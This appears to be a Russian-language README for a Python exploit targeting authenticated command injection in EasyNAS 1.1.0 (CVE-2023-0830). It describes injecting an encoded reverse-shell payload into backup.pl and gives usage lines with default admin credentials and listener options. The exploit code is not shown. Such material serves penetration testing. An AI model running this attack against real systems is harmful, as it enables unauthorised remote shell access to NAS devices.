
Эксплойт для EasyNAS версии 1.1.0. Используемая уязвимость — это недостаток внедрения команд, который требует аутентификации.
Этот Python-скрипт представляет собой мощный эксплойт для EasyNAS версии 1.1.0 с расширенной функциональностью, включая встроенный слушатель. Эксплуатируемая уязвимость — это недостаток инъекции команд, требующий аутентификации.
Скрипт устанавливает сессию с целевым сервером, затем отправляет запрос на вход с предоставленными учётными данными. После успешной аутентификации скрипт формирует полезную нагрузку, которая при выполнении открывает обратное соединение к указанным пользователем IP-адресу и порту. Эта полезная нагрузка кодируется в URL и Base64, а затем внедряется в файл backup.pl на сервере через поддельный GET-запрос.
Ivan Spiridonov (xbz0n) https://xbz0n.sh
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444
--mode {shell,reverse} Режим эксплуатации: shell (встроенная обратная оболочка) или reverse (внешний слушатель)
--lhost IP_ADDRESS IP-адрес для слушателя обратной оболочки (определяется автоматически по умолчанию)
--lport PORT Порт для слушателя обратной оболочки (по умолчанию: 4444)
--protocol {http,https} Используемый протокол (по умолчанию: https)
--verbose Включить подробный вывод
--shell {bash,sh,python} Укажите тип оболочки для встроенного слушателя (по умолчанию: bash)
Этот скрипт предназначен только для образовательных целей и авторизованного тестирования на проникновение. Всегда получайте явное разрешение перед запуском тестов на проникновение в сети или системы.
Пожалуйста, используйте ответственно.